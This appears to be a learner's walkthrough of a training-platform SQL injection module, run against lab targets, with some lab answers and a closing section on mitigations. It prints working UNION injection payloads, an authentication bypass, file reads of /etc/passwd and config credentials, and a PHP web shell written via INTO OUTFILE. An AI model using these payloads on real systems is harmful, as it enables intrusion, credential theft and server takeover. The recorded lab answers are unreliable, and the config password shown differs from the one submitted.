Even Columns

A UNION statement can only operate on SELECT statements with an equal number of columns. For example, if we attempt to UNION two queries that have results with a different number of columns, we get the following error:


The above query results in an error, as the first SELECT returns one column and the second SELECT returns two. Once we have two queries that return the same number of columns, we can use the UNION operator to extract data from other tables and databases.

For example, if the query is:

SELECT * FROM products WHERE product_id = 'user_input'

We can inject a UNION query into the input, such that rows from another table are returned:

SELECT * from products where product_id = '1' UNION SELECT username, password from passwords-- '

The above query would return username and password entries from the passwords table, assuming the products table has two columns.

Un-even Columns

We will find out that the original query will usually not have the same number of columns as the SQL query we want to execute, so we will have to work around that. For example, suppose we only had one column. In that case, we want to SELECT, we can put junk data for the remaining required columns so that the total number of columns we are UNIONing with remains the same as the original query.

For example, we can use any string as our junk data, and the query will return the string as its output for that column. If we UNION with the string "junk", the SELECT query would be SELECT "junk" from passwords, which will always return junk. We can also use numbers. For example, the query SELECT 1 from passwords will always return 1 as the output.

The products table has two columns in the above example, so we have to UNION with two columns. If we only wanted to get one column 'e.g. username', we have to do username, 2, such that we have the same number of columns:

SELECT * from products where product_id = '1' UNION SELECT username, 2 from passwords

If we had more columns in the table of the original query, we have to add more numbers to create the remaining required columns. For example, if the original query used SELECT on a table with four columns, our UNION injection would be:

UNION SELECT username, 2, 3, 4 from passwords-- '

This query would return:

SELECT * from products where product_id UNION SELECT username, 2, 3, 4 from passwords-- '

As we can see, our wanted output of the ‘UNION SELECT username from passwords' query is found at the first column of the second row, while the numbers filled the remaining columns.


Answer the question(s) below to complete this Section and earn cubes!

Target(s): Click here to spawn the target system!

Authenticate to with user “root” and password “password”

Connect to the above MySQL server with the ‘mysql’ tool, and find the number of records returned when doing a ‘Union’ of all records in the ‘employees’ table and all records in the ‘departments’ table (Hint Use the ‘describe’ function to find number and names of columns in each table, to be able to form the proper ‘union’ query).

Start with authenticate to with user “root” and password “password”

mysql -u root -h <Target system IP>-P <Port Namber> -p
  • mysql: This is the command to invoke the MySQL client, which allows you to interact with the MySQL database.
  • -u root: Specifies that you want to connect using the root user.
  • -h <Target system IP>: The -h flag is used to specify the hostname or IP address of the MySQL server you're trying to connect to.
  • -P <Port Namber>: This specifies the port number that the MySQL server is listening on.
  • -p: This prompts you for the password of the root user after hitting enter.

lets check the databases

show databases

lets use employees databases

use employees

lets check the tables

show tables;

To find the number of records returned when doing a ‘Union’ of all records in the ‘employees’ table and all records in the ‘departments’ table

We first need to find the name and number of columns

SELECT * FROM employees;

The result is 6 columns

Will do the same for departments

SELECT * FROM departments;
SELECT * FROM employees;
SELECT * FROM employees UNION SELECT dept_no, dept_name,3,4,5,6 FROM departments;

we can see at the end 663 roows

The number of records returned when doing a ‘Union’ of all records in the ‘employees’ table and all records in the ‘departments’ table

Answer: 663

Section 12 Union Injection

Now that we know how the Union clause works and how to use it let us learn how to utilize it in our SQL injections. Let us take the following example:

We see a potential SQL injection in the search parameters. We apply the SQLi Discovery steps by injecting a single quote (‘), and we do get an error:

Since we caused an error, this may mean that the page is vulnerable to SQL injection. This scenario is ideal for exploitation through Union-based injection, as we can see our queries’ results.

Detect number of columns

Before going ahead and exploiting Union-based queries, we need to find the number of columns selected by the server. There are two methods of detecting the number of columns:



The first way of detecting the number of columns is through the ORDER BY function, which we discussed earlier. We have to inject a query that sorts the results by a column we specified, ‘i.e., column 1, column 2, and so on’, until we get an error saying the column specified does not exist.

For example, we can start with order by 1, sort by the first column, and succeed, as the table must have at least one column. Then we will do order by 2 and then order by 3 until we reach a number that returns an error, or the page does not show any output, which means that this column number does not exist. The final successful column we successfully sorted by gives us the total number of columns.

If we failed at order by 4, this means the table has three columns, which is the number of columns we were able to sort by successfully. Let us go back to our previous example and attempt the same, with the following payload:

' order by 1 - -

As we see, we get a normal result:

Next, let us try to sort by the second column, with the following payload:

' order by 2 - -

We still get the results. We notice that they are sorted differently, as expected:

We do the same for column 3 and 4 and get the results back. However, when we try to ORDER BY column 5, we get the following error:

This means that this table has exactly 4 columns .


The other method is to attempt a Union injection with a different number of columns until we successfully get the results back. The first method always returns the results until we hit an error, while this method always gives an error until we get a success. We can start by injecting a 3 column UNION query:

cn' UNION select 1,2,3 - -

We get an error saying that the number of columns don’t match:

So, let’s try four columns and see the response:
Code: sql

cn' UNION select 1,2,3,4 - -

This time we successfully get the results, meaning once again that the table has 4 columns. We can use either method to determine the number of columns. Once we know the number of columns, we know how to form our payload, and we can proceed to the next step.

Location of Injection

While a query may return multiple columns, the web application may only display some of them. So, if we inject our query in a column that is not printed on the page, we will not get its output. This is why we need to determine which columns are printed to the page, to determine where to place our injection. In the previous example, while the injected query returned 1, 2, 3, and 4, we saw only 2, 3, and 4 displayed back to us on the page as the output data:

It is very common that not every column will be displayed back to the user. For example, the ID field is often used to link different tables together, but the user doesn’t need to see it. This tells us that columns 2 and 3, and 4 are printed to place our injection in any of them. We cannot place our injection at the beginning, or its output will not be printed.

This is the benefit of using numbers as our junk data, as it makes it easy to track which columns are printed, so we know at which column to place our query. To test that we can get actual data from the database ‘rather than just numbers,’ we can use the @@version SQL query as a test and place it in the second column instead of the number 2:

cn' UNION select 1,@@version,3,4 - -

As we can see, we can get the database version displayed. Now we know how to form our Union SQL injection payloads to successfully get the output of our query printed on the page. In the next section, we will discuss how to enumerate the database and get data from other tables and databases.


Answer the question(s) below to complete this Section and earn cubes!

Target(s): Click here to spawn the target system!

Use a Union injection to get the result of ‘user()’ (Hint

Try to replicate the last example).

Start with opening a web browser and enter http://<Target System IP>

Use a Union injection to get the result of ‘user()’ (Hint

Try to replicate the last example).

cn' UNION select 1,@@version,3,4-- -
  • cn': Ends the current string input in the query.
  • UNION select 1, @@version, 3, 4: This is a UNION query that will combine the results of the original query with the result from the SELECT statement.
  • 1: A dummy value to satisfy the first column.
  • @@version: Retrieves the version of the database, which would be shown in the second column.
  • 3: A dummy value to satisfy the third column.
  • 4: A dummy value to satisfy the fourth column.
  • -- -: This is a comment that will make the rest of the original query after this point get ignored by the database.

The result shows:

  • Port Code: 10.3.22-MariaDB-1ubuntu1
  • Port City: 3
  • Port Volume: 4

now that we now the correct number of columns we will inject column 3 to get result of ‘user()’

cn' UNION select 1,@@version,user(),4-- -
  • cn': Ends the input from the user, closing the string.
  • UNION select 1, @@version, user(), 4:
  • 1: Fills the first column.
  • @@version: Retrieves the version of the database, which will be returned in the second column.
  • user(): Retrieves the current database user, which will be shown in the third column.
  • 4: Fills the fourth column.
  • -- -: Comments out the rest of the original SQL query to avoid any errors or conditions from it.

The result shows :

  • Port Code (Column 1): 10.3.22-MariaDB-1ubuntu1 — This indicates the version of the MariaDB database server, showing that it's running version 10.3.22 on Ubuntu.
  • Port City (Column 2): root@localhost — This is the database user currently in use, which is root (the database administrator user) running locally (localhost).
  • Port Volume (Column 3): 4 — This was the dummy value inserted to fulfill the fourth column in the query.

The result of ‘user()

Answer: root@localhost


Section 13 Database Enumeration

In the previous sections, we learned about different SQL queries in MySQL and SQL injections and how to use them. This section will put all of that to use and gather data from the database using SQL queries within SQL injections.
MySQL Fingerprinting

Before enumerating the database, we usually need to identify the type of DBMS we are dealing with. This is because each DBMS has different queries, and knowing what it is will help us know what queries to use.

As an initial guess, if the webserver we see in HTTP responses is Apache or Nginx, it is a good guess that the webserver is running on Linux, so the DBMS is likely MySQL. The same also applies to Microsoft DBMS if the webserver is IIS, so it is likely to be MSSQL. However, this is a far-fetched guess, as many other databases can be used on either operating system or web server. So, there are different queries we can test to fingerprint the type of database we are dealing with.

As we cover MySQL in this module, let us fingerprint MySQL databases. The following queries and their output will tell us that we are dealing with MySQL:

As we saw in the example from the previous section, when we tried @@version, it gave us:

The output 10.3.22-MariaDB-1ubuntu1 means that we are dealing with a MariaDB DBMS similar to MySQL. Since we have direct query output, we will not have to test the other payloads. Instead, we can test them and see what we get.


To pull data from tables using UNION SELECT, we need to properly form our SELECT queries. To do so, we need the following information:

List of databases
List of tables within each database
List of columns within each table

With the above information, we can form our SELECT statement to dump data from any column in any table within any database inside the DBMS. This is where we can utilize the INFORMATION_SCHEMA Database.

The INFORMATION_SCHEMA database contains metadata about the databases and tables present on the server. This database plays a crucial role while exploiting SQL injection vulnerabilities. As this is a different database, we cannot call its tables directly with a SELECT statement. If we only specify a table’s name for a SELECT statement, it will look for tables within the same database.

So, to reference a table present in another DB, we can use the dot ‘.’ operator. For example, to SELECT a table users present in a database named my_database, we can use:

SELECT * FROM my_database.users;

Similarly, we can look at tables present in the INFORMATION_SCHEMA Database.


To start our enumeration, we should find what databases are available on the DBMS. The table SCHEMATA in the INFORMATION_SCHEMA database contains information about all databases on the server. It is used to obtain database names so we can then query them. The SCHEMA_NAME column contains all the database names currently present.

Let us first test this on a local database to see how the query is used:


We see the ilfreight and dev databases.

Now, let’s do the same using a UNION SQL injection, with the following payload:

cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -

Once again, we see two databases, ilfreight and dev, apart from the default ones. Let us find out which database the web application is running to retrieve ports data from. We can find the current database with the SELECT database() query. We can do this similarly to how we found the DBMS version in the previous section:

cn' UNION select 1,database(),2,3-- -

We see that the database name is ilfreight. However, the other database (dev) looks interesting. So, let us try to retrieve the tables from it.


Before we dump data from the dev database, we need to get a list of the tables to query them with a SELECT statement. To find all tables within a database, we can use the TABLES table in the INFORMATION_SCHEMA Database.

The TABLES table contains information about all tables throughout the database. This table contains multiple columns, but we are interested in the TABLE_SCHEMA and TABLE_NAME columns. The TABLE_NAME column stores table names, while the TABLE_SCHEMA column points to the database each table belongs to. This can be done similarly to how we found the database names. For example, we can use the following payload to find the tables within the dev database:

cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -

We see four tables in the dev database, namely credentials, framework, pages, and posts. For example, the credentials table could contain sensitive information to look into it.


To dump the data of the credentials table, we first need to find the column names in the table, which can be found in the COLUMNS table in the INFORMATION_SCHEMA database. The COLUMNS table contains information about all columns present in all the databases. This helps us find the column names to query a table for. The COLUMN_NAME, TABLE_NAME, and TABLE_SCHEMA columns can be used to achieve this. As we did before, let us try this payload to find the column names in the credentials table:

cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -

The table has two columns named username and password. We can use this information and dump data from the table.


Now that we have all the information, we can form our UNION query to dump data of the username and password columns from the credentials table in the dev database. We can place username and password in place of columns 2 and 3:

cn' UNION select 1, username, password, 4 from dev.credentials-- -

We were able to get all the entries in the credentials table, which contains sensitive information such as password hashes and an API key.


Answer the question(s) below to complete this Section and earn cubes!

Target(s): Click here to spawn the target system!

What is the password hash for ‘newuser’ stored in the ‘users’ table in the ‘ilfreight’ database?

Start with opening a web browser and enter http://<Target System IP>

What is the password hash for ‘newuser’ stored in the ‘users’ table in the ‘ilfreight’ database?

Start with extract data from the table dev.credentials, assuming that the table contains credentials (like usernames and passwords). Requesting the second column to display the current database user (user()) and dummy values (3 and 4) to satisfy the column requirements.

cn' UNION select 1, user(),3,4 from dev.credentials-- -
  • cn': Ends the input string from the search query.
  • UNION select 1, user(), 3, 4 from dev.credentials: Attempts to fetch data from the dev.credentials table:
  • 1: Fills the first column with a placeholder value.
  • user(): Fetches the current database user, to be returned in the second column.
  • 3: Dummy value for the third column.
  • 4: Dummy value for the fourth column.
  • -- -: Comments out the rest of the query to avoid errors.

The result shows:

  • Port Code (Column 1): root@localhost — This is the current database user.
  • Port City (Column 2): 3 — This is a dummy value or result of the query.
  • Port Volume (Column 3): 4 — Another dummy value.
cn' UNION select 1, username, password, 4 from users-- -

· cn’: This part closes the original string or query in the web application’s SQL statement. The ‘ at the end is meant to end any string input, which allows you to start injecting your own SQL query.

· UNION: The UNION keyword is used to combine the results of two SELECT statements. The purpose is to append the result of the injected query to the result of the original query, which may display sensitive information.

o The UNION query requires that the number of columns in both queries match. If the original query is selecting 4 columns, you need to ensure your UNION query also selects 4 columns.

· select 1, username, password, 4 from users: This part is selecting specific columns from the users table (assuming the table users exists in the database).

· 1: A placeholder value for the first column in the result.

· username: Assumes there is a column named username in the users table.

· password: Assumes there is a column named password in the users table.

· 4: Another placeholder value for the fourth column.

· -:This sequence is a SQL comment. The — tells the SQL server to ignore the rest of the original query after this point. It effectively neutralizes any part of the original query that comes after the injection, preventing syntax errors.

The result shows:

  • Username: admin
  • Password Hash: 392037dbba51f692776d6cefb6dd546d
  • Username: newuser
  • Password Hash: 9da2c9bcdf39d8610954e0e11ea8f45f

What is the password hash for ‘newuser’ stored in the ‘users’ table in the ‘ilfreight’ database?

Answer: 9da2c9bcdf39d8610954e0e11ea8f45f

Section 14 Reading Files

In addition to gathering data from various tables and databases within the DBMS, a SQL Injection can also be leveraged to perform many other operations, such as reading and writing files on the server and even gaining remote code execution on the back-end server.


Reading data is much more common than writing data, which is strictly reserved for privileged users in modern DBMSes, as it can lead to system exploitation, as we will see. For example, in MySQL, the DB user must have the FILE privilege to load a file’s content into a table and then dump data from that table and read files. So, let us start by gathering data about our user privileges within the database to decide whether we will read and/or write files to the back-end server.

DB User

First, we have to determine which user we are within the database. While we do not necessarily need database administrator (DBA) privileges to read data, this is becoming more required in modern DBMSes, as only DBA are given such privileges. The same applies to other common databases. If we do have DBA privileges, then it is much more probable that we have file-read privileges. If we do not, then we have to check our privileges to see what we can do. To be able to find our current DB user, we can use any of the following queries:

SELECT user from mysql.user

Our UNION injection payload will be as follows:

cn' UNION SELECT 1, user(), 3, 4-- -


cn' UNION SELECT 1, user, 3, 4 from mysql.user - -

Which tells us our current user, which in this case is root:

This is very promising, as a root user is likely to be a DBA, which gives us many privileges.

User Privileges

Now that we know our user, we can start looking for what privileges we have with that user. First of all, we can test if we have super admin privileges with the following query:

SELECT super_priv FROM mysql.user

Once again, we can use the following payload with the above query:

cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user - -

If we had many users within the DBMS, we can add WHERE user=”root” to only show privileges for our current user root:

cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root" - -

The query returns Y, which means YES, indicating superuser privileges. We can also dump other privileges we have directly from the schema, with the following query:

cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges - -

From here, we can add WHERE grantee=”’root’@’localhost’” to only show our current user root privileges. Our payload would be:

cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"

And we see all of the possible privileges given to our current user:

We see that the FILE privilege is listed for our user, enabling us to read files and potentially even write files. Thus, we can proceed with attempting to read files.


Now that we know we have enough privileges to read local system files, let us do that using the LOAD_FILE() function. The LOAD_FILE() function can be used in MariaDB / MySQL to read data from files. The function takes in just one argument, which is the file name. The following query is an example of how to read the /etc/passwd file:

SELECT LOAD_FILE('/etc/passwd');

Similar to how we have been using a UNION injection, we can use the above query:

cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4 - -

We were able to successfully read the contents of the passwd file through the SQL injection. Unfortunately, this can be potentially used to leak the application source code as well.

Another Example

We know that the current page is search.php. The default Apache webroot is /var/www/html. Let us try reading the source code of the file at /var/www/html/search.php.

cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4 - -

However, the page ends up rendering the HTML code within the browser. The HTML source can be viewed by hitting [Ctrl + U].

The source code shows us the entire PHP code, which could be inspected further to find sensitive information like database connection credentials or find more vulnerabilities.


Answer the question(s) below to complete this Section and earn cubes!

Target(s): Click here to spawn the target system!

We see in the above PHP code that ‘$conn’ is not defined, so it must be imported using the PHP include command. Check the imported page to obtain the database password (Hint Once you identify the name of the imported configuration file, try to read the source of these files).

Start with opening a web browser and enter http://<Target System IP>:<Port>

We see in the above PHP code that ‘$conn’ is not defined, so it must be imported using the PHP include command. Check the imported page to obtain the database password ( Hint Once you identify the name of the imported configuration file, try to read the source of these files).

Start with trying to read and display of the source code of the file search.php, which is located on the web server

cn' UNION SELECT 1, LOAD_FILE("/var/www/html/config.php"), 3, 4-- -
  • cn’: This part closes the initial query by ending a string (‘), assuming that the original query uses user input in a string. The idea is to escape from the original query and inject a new SQL statement.
  • UNION SELECT: The UNION statement allows combining the results of two SELECT queries. In SQL injection, this is commonly used to append additional data retrieval to the original query. The injected query is meant to retrieve specific information alongside the data from the original query.
  • 1, LOAD_FILE(“/var/www/html/search.php”), 3, 4: This selects four values:

1: Just a placeholder value.

LOAD_FILE(“/var/www/html/search.php”): This function reads the contents of a file on the server. Here, it’s used to try and read the file /var/www/html/search.php, which contains the source code for that PHP page.

3, 4: These are placeholder values to fill in for the number of columns required to match the original query.

  • — -: The — sequence is used to comment out the rest of the original SQL query. Everything after — is ignored by the database engine, ensuring that only the injected query runs.

After viewe the HTML source by hitting [Ctrl + U]

The source code shows us the entire PHP code

Check the configuration file

cn' UNION SELECT 1, LOAD_FILE("/var/www/html/config.php"), 3, 4-- -

The result shows the contents of the config.php file, which includes the database credentials.

  • DB Host: localhost
  • DB Username: root
  • DB Password: db_Password_is_flag!
  • DB Name: lifreight

What is the database password

Answer: dB_pAssw0rd_iS_flag!

Section 15 Writing Files

When it comes to writing files to the back-end server, it becomes much more restricted in modern DBMSes, since we can utilize this to write a web shell on the remote server, hence getting code execution and taking over the server. This is why modern DBMSes disable file-write by default and require certain privileges for DBA’s to write files. Before writing files, we must first check if we have sufficient rights and if the DBMS allows writing files.

Write File Privileges

To be able to write files to the back-end server using a MySQL database, we require three things:

User with FILE privilege enabled
MySQL global secure_file_priv variable not enabled
Write access to the location we want to write to on the back-end server

We have already found that our current user has the FILE privilege necessary to write files. We must now check if the MySQL database has that privilege. This can be done by checking the secure_file_priv global variable.


The secure_file_priv variable is used to determine where to read/write files from. An empty value lets us read files from the entire file system. Otherwise, if a certain directory is set, we can only read from the folder specified by the variable. On the other hand, NULL means we cannot read/write from any directory. MariaDB has this variable set to empty by default, which lets us read/write to any file if the user has the FILE privilege. However, MySQL uses /var/lib/mysql-files as the default folder. This means that reading files through a MySQL injection isn’t possible with default settings. Even worse, some modern configurations default to NULL, meaning that we cannot read/write files anywhere within the system.

So, let’s see how we can find out the value of secure_file_priv. Within MySQL, we can use the following query to obtain the value of this variable:

SHOW VARIABLES LIKE 'secure_file_priv';

However, as we are using a UNION injection, we have to get the value using a SELECT statement. This shouldn’t be a problem, as all variables and most configurations’ are stored within the INFORMATION_SCHEMA database. MySQL global variables are stored in a table called global_variables, and as per the documentation, this table has two columns variable_name and variable_value.

We have to select these two columns from that table in the INFORMATION_SCHEMA database. There are hundreds of global variables in a MySQL configuration, and we don’t want to retrieve all of them. We will then filter the results to only show the secure_file_priv variable, using the WHERE clause we learned about in a previous section.

The final SQL query is the following:

SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"

So, similar to other UNION injection queries, we can get the above query result with the following payload. Remember to add two more columns 1 & 4 as junk data to have a total of 4 columns’:

cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv" - -

And the result shows that the secure_file_priv value is empty, meaning that we can read/write files to any location.


Now that we have confirmed that our user should write files to the back-end server, let’s try to do that using the SELECT .. INTO OUTFILE statement. The SELECT INTO OUTFILE statement can be used to write data from select queries into files. This is usually used for exporting data from tables.

To use it, we can add INTO OUTFILE ‘…’ after our query to export the results into the file we specified. The below example saves the output of the users table into the /tmp/credentials file:

SELECT * from users INTO OUTFILE '/tmp/credentials';

If we go to the back-end server and cat the file, we see that table’s content:

cat /tmp/credentials 

It is also possible to directly SELECT strings into files, allowing us to write arbitrary files to the back-end server.

SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt';

When we cat the file, we see that text:

cat /tmp/test.txt 
ls -la /tmp/test.txt 

As we can see above, the test.txt file was created successfully and is owned by the mysql user.

Writing Files through SQL Injection

Let’s try writing a text file to the webroot and verify if we have write permissions. The below query should write file written successfully! to the /var/www/html/proof.txt file, which we can then access on the web application:

select 'file written successfully!' into outfile '/var/www/html/proof.txt'

The UNION injection payload would be as follows:

cn' union select 1,'file written successfully!',3,4 into outfile '/var/www/html/proof.txt' - -

We don’t see any errors on the page, which indicates that the query succeeded. Checking for the file proof.txt in the webroot, we see that it indeed exists:

Writing a Web Shell

Having confirmed write permissions, we can go ahead and write a PHP web shell to the webroot folder. We can write the following PHP webshell to be able to execute commands directly on the back-end server:

<?php system($_REQUEST[0]); ?>

We can reuse our previous UNION injection payload, and change the string to the above, and the file name to shell.php:

cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -

Once again, we don’t see any errors, which means the file write probably worked. This can be verified by browsing to the /shell.php file and executing commands via the 0 parameter, with ?0=id in our URL:

The output of the id command confirms that we have code execution and are running as the www-data user.


Answer the question(s) below to complete this Section and earn cubes!

Target(s): Click here to spawn the target system!

Find the flag by using a webshell (Hint It’s one directory away from you!).

Start with opening a web browser and enter http://<Target System IP>:<Port>

Find the flag by using a webshell ( Hint It’s one directory away from you!).

Start with creating a basic PHP web shell (shell.php) on the server directory.

cn' UNION SELECT "",'<?php system($_REQUEST[0]); ?>',"", "" INTO OUTFILE '/var/www/html/shell.php'-- -

· cn’: This closes any existing SQL query that the web application may be running.

· UNION SELECT: This is part of the SQL UNION injection technique. It allows to append the results of the custom SELECT statement to the original query’s result set. The SELECT here is used to define the values we want to insert into the file.

· “”, ‘<?php system($_REQUEST[0]); ?>’, “”, “”: This part specifies the content we want to write into the file.

  • The first “” and the last two “” are placeholders (junk data) required because the SQL query likely expects multiple columns (in this case, 4 columns total).
  • The main content is the second item: ‘<?php system($_REQUEST[0]); ?>’. This is PHP code for a web shell. When the file is accessed, this PHP script will execute any system command passed as a parameter via the 0 query string.
  • <?php … ?>: The opening and closing tags for PHP code.
  • system(): A PHP function that executes a command on the server.
  • $_REQUEST[0]: This retrieves a parameter passed to the URL with the key 0. For example, if you visit shell.php?0=id, the PHP shell will run the id command on the server.

· INTO OUTFILE ‘/var/www/html/shell.php’: This writes the content of the SQL query into a file /var/www/html/shell.php.

· -: This is a SQL comment. Anything following — is ignored by the SQL interpreter, effectively neutralizing any remaining part of the original query and ensuring that the injection only runs our SQL statement, preventing errors or unwanted execution of additional code.

No response that’s good no response means it ran without an error

Check the Web Shell on the target server, navigate to it using the browser

http://<Target System IP>:<Port>/shell.php?0=id

We got accessed to the web shell at http://<Target System IP>:<Port>/shell.php

List the contents of the /var/www/html/ directory.

http://<Target System IP>:<Port>/shell.php?0=ls

The resolt is listed of the /var/www/html directory.

  • config.php
  • index.php
  • search.php
  • shell.php (the web shell that was uploaded)
  • style.css

Move up one directory level and list the contents there ..

Read the contents of the flag.txt file ../flag.txt

Now we know the contents of the flag file

What is the flag we found by using a webshell

Answer: d2b5b27ae688b6a0f1d21b7d3a0798cd

Section 16 Mitigations

Mitigating SQL Injection

We have learned about SQL injections, why they occur, and how we can exploit them. We should also learn how to avoid these types of vulnerabilities in our code and patch them when found. Let’s look at some examples of how SQL Injection can be mitigated.

Input Sanitization

Here’s the snippet of the code from the authentication bypass section we discussed earlier:

$username = $_POST['username'];
$password = $_POST['password'];
$query = "SELECT * FROM logins WHERE username='". $username. "' AND password = '" . $password . "';" ;
echo "Executing query: " . $query . "<br /><br />";
if (!mysqli_query($conn ,$query))
die('Error: ' . mysqli_error($conn));
$result = mysqli_query($conn, $query);
$row = mysqli_fetch_array($result);
As we can see, the script takes in the username and password from the POST request and passes it to the query directly. This will let an attacker inject anything they wish and exploit the application. Injection can be avoided by sanitizing any user input, rendering injected queries useless. Libraries provide multiple functions to achieve this, one such example is the mysqli_real_escape_string() function. This function escapes characters such as ' and ", so they don't hold any special meaning.
Code: php

As we can see, the script takes in the username and password from the POST request and passes it to the query directly. This will let an attacker inject anything they wish and exploit the application. Injection can be avoided by sanitizing any user input, rendering injected queries useless. Libraries provide multiple functions to achieve this, one such example is the mysqli_real_escape_string() function. This function escapes characters such as ‘ and “, so they don’t hold any special meaning.

$username = mysqli_real_escape_string($conn, $_POST['username']);
$password = mysqli_real_escape_string($conn, $_POST['password']);

$query = "SELECT * FROM logins WHERE username='". $username. "' AND password = '" . $password . "';" ;
echo "Executing query: " . $query . "<br /><br />";

The snippet above shows how the function can be used.

As expected, the injection no longer works due to escaping the single quotes. A similar example is the pg_escape_string() which used to escape PostgreSQL queries.

Input Validation

User input can also be validated based on the data used to query to ensure that it matches the expected input. For example, when taking an email as input, we can validate that the input is in the form of @email.com, and so on.

Consider the following code snippet from the ports page, which we used UNION injections on:

if (isset($_GET["port_code"])) {
$q = "Select * from ports where port_code ilike '%" . $_GET["port_code"] . "%'";
$result = pg_query($conn,$q);

if (!$result)
die("</table></div><p style='font-size: 15px;'>" . pg_last_error($conn). "</p>");

We see the GET parameter port_code being used in the query directly. It’s already known that a port code consists only of letters or spaces. We can restrict the user input to only these characters, which will prevent the injection of queries. A regular expression can be used for validating the input:

$pattern = "/^[A-Za-z\s]+$/";
$code = $_GET["port_code"];
if(!preg_match($pattern, $code)) {
die("</table></div><p style='font-size: 15px;'>Invalid input! Please try again.</p>");
$q = "Select * from ports where port_code ilike '%" . $code . "%'";

The code is modified to use the preg_match() function, which checks if the input matches the given pattern or not. The pattern used is [A-Za-z\s]+, which will only match strings containing letters and spaces. Any other character will result in the termination of the script.

We can test the following injection:

'; SELECT 1,2,3,4 - -

As seen in the images above, input with injected queries was rejected by the server.

User Privileges

As discussed initially, DBMS software allows the creation of users with fine-grained permissions. We should ensure that the user querying the database only has minimum permissions.

Superusers and users with administrative privileges should never be used with web applications. These accounts have access to functions and features, which could lead to server compromise.
Mitigating SQL Injection

The commands above add a new MariaDB user named reader who is granted only SELECT privileges on the ports table. We can verify the permissions for this user by logging in:

The snippet above confirms that the reader user cannot query other tables in the ilfreight database. The user only has access to the ports table that is needed by the application.

Web Application Firewall

Web Application Firewalls (WAF) are used to detect malicious input and reject any HTTP requests containing them. This helps in preventing SQL Injection even when the application logic is flawed. WAFs can be open-source (ModSecurity) or premium (Cloudflare). Most of them have default rules configured based on common web attacks. For example, any request containing the string INFORMATION_SCHEMA would be rejected, as it’s commonly used while exploiting SQL injection.

Parameterized Queries

Another way to ensure that the input is safely sanitized is by using parameterized queries. Parameterized queries contain placeholders for the input data, which is then escaped and passed on by the drivers. Instead of directly passing the data into the SQL query, we use placeholders and then fill them with PHP functions.

Consider the following modified code:

$username = $_POST['username'];
$password = $_POST['password'];
$query = "SELECT * FROM logins WHERE username=? AND password = ?" ;
$stmt = mysqli_prepare($conn, $query);
mysqli_stmt_bind_param($stmt, 'ss', $username, $password);
$result = mysqli_stmt_get_result($stmt);
$row = mysqli_fetch_array($result);

The query is modified to contain two placeholders, marked with ? where the username and password will be placed. We then bind the username and password to the query using the mysqli_stmt_bind_param() function. This will safely escape any quotes and place the values in the query.


The list above is not exhaustive, and it could still be possible to exploit SQL injection based on the application logic. The code examples shown are based on PHP, but the logic applies across all common languages and libraries.

Section 17 Closing it Out

Skills Assessment — SQL Injection Fundamentals

The company Inlanefreight has contracted you to perform a web application assessment against one of their public-facing websites. In light of a recent breach of one of their main competitors, they are particularly concerned with SQL injection vulnerabilities and the damage the discovery and successful exploitation of this attack could do to their public image and bottom line.

They provided a target IP address and no further information about their website. Perform a full assessment of the web application from a “grey box” approach, checking for the existence of SQL injection vulnerabilities.

Find the vulnerabilities and submit a final flag using the skills we covered to complete this module. Don’t forget to think outside the box!


Answer the question(s) below to complete this Section and earn cubes!

Target(s): Click here to spawn the target system!

Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer (Hint Try to read files you know to find a location you can write to).

Start with open a web browser and enter http://<Target System IP>:<Port>

Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer (Hint Try to read files you know to find a location you can write to).

First will try authentication bypass

at the Username field enter the payload and at Password field enter whatever password you want and try to login

admin' or '1'='1

The result is Incorrect credentials

Will try a different payload

admin' or '1'='1'-- -
  • admin' closes the username field.
  • or '1'='1' is a condition that always evaluates to true.
  • -- - comments out the rest of the query to bypass the password check.

The result is access to the system without proper credentials.

Now will test the Search Bar for SQL Injection


The result is an error message “The used SELECT statements have a different number of columns” indicates that your SQL injection query failed because the number of columns in your injected UNION SELECT query doesn't match the number of columns returned by the original query.

Add columns to theUNION SELECT query until the error message disappears.

' UNION SELECT 1,2,3,4,5-- -

The result is that the correct number of columns (5 columns)

Now that you know the number of columns we can retrieve the version of the database by replacing one of the columns with @@version

' UNION SELECT 1,@@version,3,4,5-- -

The result shows that the database version: MariaDB 10.3.22–1ubuntu1. This confirms the server is running MariaDB on Ubuntu.

Retrieve the schema names (databases) from the INFORMATION_SCHEMA.SCHEMATA table.


The result shows a list of databases from the server

  • information_schema: System database that contains metadata about all other databases.
  • mysql: System database used by MySQL to store information about users, privileges, etc.
  • performance_schema: System database used for monitoring MySQL server performance.
  • ilfreight: This is likely the application database that could contain important data related to the web application.
  • backup: This could be a backup of data, potentially holding sensitive information.

Now crate SQL injection query that writes the text 'file written successfully!' into a file located at /var/www/html/dashboard/proof.txt on the server.

' UNION SELECT 1, 'file written successfully!', 3, 4, 5 INTO OUTFILE '/var/www/html/dashboard/proof.txt' --

the result didn't show an error the file write prabbly worked

Open web browser and navigate to http://<Target_IP>/dashboard/proof.txt

The text file was successfully written

Creating a Web Shell

' UNION SELECT 1, 2, '<?php system($_REQUEST[0]); ?>', 4, 5 INTO OUTFILE '/var/www/html/dashboard/shell.php'-- -

the result didn't show an error the file write prabbly worked

Open web browser and navigate to http://<Target_IP>/dashboard/shell.php?0=ls

The trsult shows that the ls command worked successfully, as it listed the contents of the /dashboard directory. It includes the following files:

  • bg.png
  • dashboard.css
  • dashboard.js
  • dashboard.php
  • index.php
  • proof.txt
